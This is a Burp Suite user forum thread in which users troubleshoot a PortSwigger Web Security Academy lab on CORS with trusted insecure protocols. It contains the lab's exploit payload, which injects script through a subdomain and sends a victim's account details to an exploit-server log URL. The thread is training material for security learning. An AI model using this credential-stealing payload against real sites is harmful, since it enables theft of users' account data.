Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab Not Working Anymore : CORS vulnerability with trusted insecure protocols

Achint | Last updated: Apr 12, 2024 09:22AM UTC

I am trying to solve the mentioned lab, with the payload provided by the academy, by the payload isn't working. When i view the payload, the request is indeed sent to stock subdomain, but it replies with "Unauthorized",since the cookie is not included in the request. ## Payload <script> document.location="http://stock.0ad000570345633e81fd1b55005d001d.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0ad000570345633e81fd1b55005d001d.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://exploit-0a8d001a039663f481a91aaa0144009c.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1" </script> ## Response From /accountDetails HTTP/2 401 Unauthorized Content-Type: application/json; charset=utf-8 Set-Cookie: session=EgIsHteiGser2A2asuxMQRV1BMAKIFfg; Secure; HttpOnly; SameSite=None X-Frame-Options: SAMEORIGIN Content-Length: 14 "Unauthorized" I am using burp's in-built browser.

Achint | Last updated: Apr 12, 2024 09:25AM UTC

Found the solution, this is because lab is `setting secure flag on the cookie`, but the `mentioned payload specifies `http` for stock subdomain`, hence the cookie is not sent, kindly fix that.

Ben, PortSwigger Agent | Last updated: Apr 12, 2024 09:36AM UTC

Hi Achint, Having just run through this lab using the embedded browser in the latest version of Burp I am able to successfully solve it using the solution provided so it does still appear to be working as expected. Are you logged into the wiener user account when you come to carry out the 'View exploit' functionality and test your exploit?

Achint | Last updated: Apr 12, 2024 09:45AM UTC

Yes, i am logged in as wiener, when i do `View Exploit`, it does land me on the stock subdomain, but the request to /accountDetails returns "unauthorized", but changing the protocol from http to https for subdomain works.

Achint | Last updated: Apr 12, 2024 09:48AM UTC

# Console Error Access to XMLHttpRequest at 'https://0ad000570345633e81fd1b55005d001d.web-security-academy.net/accountDetails' from origin 'http://stock.0ad000570345633e81fd1b55005d001d.web-security-academy.net' has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource.

Ben, PortSwigger Agent | Last updated: Apr 12, 2024 11:02AM UTC

Hi Achint, Is it possible for you to send some screenshots or a video of the complete set of steps that you are using so that we can see this exactly? The behaviour that you are seeing is not what I am experiencing so getting some more details would be very useful.

pcu43 | Last updated: May 06, 2024 07:44AM UTC

I just wanted to mention that I also ran into the same issue as the OP. If I change the protocol from "http://stock.YOUR-LAB-ID.web-security-academy.net" to "https://stock.YOUR-LAB-ID.web-security-academy.net" (http to https) in the javascript code, then it works.

pcu43 | Last updated: May 06, 2024 07:58AM UTC

To clarify, changing it from "http" to "https" makes the "View exploit" function work, but "Deliver exploit to victim" doesn't work. Changing it back to "http" will prevent "View exploit" function from working, but the "Deliver exploit to victim" will work as designed.

Ben, PortSwigger Agent | Last updated: May 07, 2024 12:20PM UTC

Hi, To confirm, is this when you are using the embedded browser?

pcu43 | Last updated: May 08, 2024 04:42AM UTC

Hi, Yes this is when using the embedded browser.

Ben, PortSwigger Agent | Last updated: May 08, 2024 07:12AM UTC

Hi, If you use a normal version of Chrome, does this allow you to both view and deliver the exploit in the manner described in the written solution?

pcu43 | Last updated: May 09, 2024 07:48AM UTC

Ok yes the normal version of Chrome works fine for both "View exploit" and "Deliver exploit to victim". These are the current versions of the browsers I have installed: Embedded: Version 124.0.6367.118 (Official Build) (64-bit) Normal: Version 124.0.6367.156 (Official Build) (64-bit) I also just tried the embedded version again since my Burp got updated yesterday and I still have the same problem with the embedded browser. Clicking on the "View exploit" button hangs on the error page and the GET /accountDetails request returns unauthorized: HTTP/2 401 Unauthorized Content-Type: application/json; charset=utf-8 Set-Cookie: session=SXckb2d1WvjJeCZbVLSgC8shRkQqQN1q; Secure; HttpOnly; SameSite=None X-Frame-Options: SAMEORIGIN Content-Length: 14 "Unauthorized"

Ben, PortSwigger Agent | Last updated: May 09, 2024 12:17PM UTC

Hi, Thank you for confirming that a standard version of Chrome can solve this lab. The embedded browser has a flag enabled by default that is impacting these labs (this flag is not currently enabled in standard versions of Chrome), hence the issues that you are seeing. You would be advised to use a normal version of Chrome whilst we address this issue.

Tyla | Last updated: Jul 18, 2024 08:33AM UTC